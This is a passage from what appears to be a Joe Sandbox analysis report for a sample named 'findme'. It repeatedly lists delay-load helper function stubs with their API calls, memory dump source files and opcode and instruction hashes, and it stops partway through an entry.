                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: e7f0b576b0948cdd55d57336a7d653b371e9ce7388cc707751dfb4b747582404
                    • Instruction ID: b8b81e0cd25fe623d8200b428903a7f594dfa512954c65f5980b670461aca4b7
                    • Opcode Fuzzy Hash: e7f0b576b0948cdd55d57336a7d653b371e9ce7388cc707751dfb4b747582404
                    • Instruction Fuzzy Hash: EBB012E5A6C1017C31497205FC26E36025CC8C3B14730411FB10DD12C0D4486C45943F
                    Function 004DD8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 593ce591ee064f993fa7afabae0c9bcbe373280405715da69aefe44675e1407f
                    • Instruction ID: 0a8616c967192327af907b82e2a0fba02088c0603b7dee56bf8bac479767b32d
                    • Opcode Fuzzy Hash: 593ce591ee064f993fa7afabae0c9bcbe373280405715da69aefe44675e1407f
                    • Instruction Fuzzy Hash: F0B012E5A6C0017C310D7206FC26E36025CD8C3B14730401FB10DD12C0D4486C05943F
                    Function 004DD8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 1fe172825b1f0c47a4732f0fc5027ec0be5fc945061fe3a710a8085fa8f63a82
                    • Instruction ID: f50b24f7e89f2f6f532e5951a5afc541e780f327139863d900feeedb7874ceed
                    • Opcode Fuzzy Hash: 1fe172825b1f0c47a4732f0fc5027ec0be5fc945061fe3a710a8085fa8f63a82
                    • Instruction Fuzzy Hash: 2AB012E5A6C0017C310D7205FD27E36025CC8C3B14730401FB10DD12C0D4486D06943F
                    Function 004DD891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 879e2bea2e17c1b5ba4fc11f2d493ae787e80637b34d8173e9e1a82c570f3dbc
                    • Instruction ID: c3349fdbb39ea6515264d5210dbbeb06f36280b95d850c6d42a58335d88bc8da
                    • Opcode Fuzzy Hash: 879e2bea2e17c1b5ba4fc11f2d493ae787e80637b34d8173e9e1a82c570f3dbc
                    • Instruction Fuzzy Hash: F4B012D9A6C3017C31093201FC76D3B021CC8C3B14730852FB109E01C0D4486C49983F
                    Function 004DD8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 6f3ca6893875681e587f810d3c82283d032b347624726093fd2a2337fc2d90a4
                    • Instruction ID: 021f2f55e6843240b1bf17e68a93a613e759c371b4e422a1cc9ff64246c3397e
                    • Opcode Fuzzy Hash: 6f3ca6893875681e587f810d3c82283d032b347624726093fd2a2337fc2d90a4
                    • Instruction Fuzzy Hash: 5AB012D9A6C1057C31097205FC66E3B025CE8C3B14730801FB109D12C0D4486C05553F
                    Function 004DD8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: c1ccebccd8e7c5fe1b67280c8db7696d1ddd1f82972cd555cf7b45237bec4d32
                    • Instruction ID: dfe55df55ce2381f5d03da86da33d1638f162dbe5b0fe6fdde96e2ffc099e06c
                    • Opcode Fuzzy Hash: c1ccebccd8e7c5fe1b67280c8db7696d1ddd1f82972cd555cf7b45237bec4d32
                    • Instruction Fuzzy Hash: D7B012D5A6C0017C31097205FC26E36025CC8C3B14B30C01FB509D13C0D4486C1A543F
                    Function 004DD942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: e5dac5f689337b69a4f7e48c374aef3f7efe3c52d834fef7dbf15e2c7fa840eb
                    • Instruction ID: 6eac31ff56d40b41eb3f14402c3655bbe502fb3630398b60c39d556ab56082fd
                    • Opcode Fuzzy Hash: e5dac5f689337b69a4f7e48c374aef3f7efe3c52d834fef7dbf15e2c7fa840eb
                    • Instruction Fuzzy Hash: 0CB012E5A6C0117C310E7205FD27E3602DCC8C3B14B30411FB109D12C0D4486C06583F
                    Function 004DD906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: d465ef40027e00520580ed3322e7ce1010a6856d9b674ecbaacfa2dfa08422ad
                    • Instruction ID: a355f6a662ae5cad9f22f3fb89186bce9ef5620812ab49b0503fccae9aeb2ebe
                    • Opcode Fuzzy Hash: d465ef40027e00520580ed3322e7ce1010a6856d9b674ecbaacfa2dfa08422ad
                    • Instruction Fuzzy Hash: E9B012D5E6D0017C310D7205FC26E36025DC8C3B14B30801FB509D12C0D4486C45543F
                    Function 004DD910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 3087249968b7d60b66924ffebb228f0e73633cfb08aaf188c23cb7a9f3cc12b0
                    • Instruction ID: 958be8ebc6b258716822f05b0c05bb9ef4089a4e016a426e6970986781938b35
                    • Opcode Fuzzy Hash: 3087249968b7d60b66924ffebb228f0e73633cfb08aaf188c23cb7a9f3cc12b0
                    • Instruction Fuzzy Hash: 98B012E5E6D1017C314D7305FC26E36025DC8C3B14B30411FB109D12C0D4486C45543F
                    Function 004DD92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 7e5ab4cc2ae1849531e4e655340b2c12f0e9c73b35b9b85aaf5b139b73b683ca
                    • Instruction ID: 9de657f1b6487e4073a87449844d0f5cce9588dccf6434cdc94b0ce104318085
                    • Opcode Fuzzy Hash: 7e5ab4cc2ae1849531e4e655340b2c12f0e9c73b35b9b85aaf5b139b73b683ca
                    • Instruction Fuzzy Hash: 33B012D5A6C0117C310A7215FC26E36029CC8C3B14730811FB609D12C0D5486C05583F
                    Function 004DD924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 4560ff2f6e2625665fe6016c43f0948df344c3edb667d8a6128d8b54972bcef1
                    • Instruction ID: 1c7f5f341bbeee25c0df82d69798687b9947fe6d981f8ebc64f12ce0ecc59d1a
                    • Opcode Fuzzy Hash: 4560ff2f6e2625665fe6016c43f0948df344c3edb667d8a6128d8b54972bcef1
                    • Instruction Fuzzy Hash: 79B012D5E7D0017C310D7205FC26E36029DDCC3B14B30401FB109D12C0D4486C05543F
                    Function 004DE1F9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DE20B
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: d86e718c898cb63a9e51be964d1e1f297113dea8fce5569cb44ec1abf2f38362
                    • Instruction ID: dbac401e3cc39592388e9718a336d9bda7f3726b7126ba4fd009bc326afd2248
                    • Opcode Fuzzy Hash: d86e718c898cb63a9e51be964d1e1f297113dea8fce5569cb44ec1abf2f38362
                    • Instruction Fuzzy Hash: 32B0129576E0017C320C6202FD2ED36032CC8C1B50730801FB205D81C096484D0A403F
                    Function 004DDACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 50280e51421cef13cc9696dd2566739dbca362287d0b370ef739256656614a33
                    • Instruction ID: 30f3ce99f4006f30652185f3e8cc067b90fc0cccc973b84e27eb961c1d3ce70c
                    • Opcode Fuzzy Hash: 50280e51421cef13cc9696dd2566739dbca362287d0b370ef739256656614a33
                    • Instruction Fuzzy Hash: 6BB012A566C002BC31087206FC2AE3A029CC5C1B10730C11FB409C0384D44C4C05843F
                    Function 004DDAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 4cbdb08c9ab3249d824b3bf5775cccc30b475de3fe0654ea1e1f16f04749ddae
                    • Instruction ID: d674222d42a43dfa5ed251625b189492172345c9eea618505521ce209b490ecc
                    • Opcode Fuzzy Hash: 4cbdb08c9ab3249d824b3bf5775cccc30b475de3fe0654ea1e1f16f04749ddae
                    • Instruction Fuzzy Hash: FDB0129566C002BC31087206FC2AF3E029CE4C5B10B30C51FB109C0384D44C4C0A443F
                    Function 004DDB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: cb2db1a9bc5c715608cbb485f991aea2882ee3cfc1c823f7ad7c7459b33e51a6
                    • Instruction ID: 8be35949881ba464a98c6ed607b4218f1c54b06749a651477567ceef7b9e43b5
                    • Opcode Fuzzy Hash: cb2db1a9bc5c715608cbb485f991aea2882ee3cfc1c823f7ad7c7459b33e51a6
                    • Instruction Fuzzy Hash: 97B012956AC1067C31087207FC2AF3A029CE4C1B10730C11FB009C0384D44C4C05453F
                    Function 004DDBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 2482df2ecb0af31ff4172e7f9e7ece1204f8a0e5a16302da43e63d77fa9fbb42
                    • Instruction ID: 4e231ca38a3861bb916541ac79875eca1abc2f15c4ef798141c985dc5ccc9e98
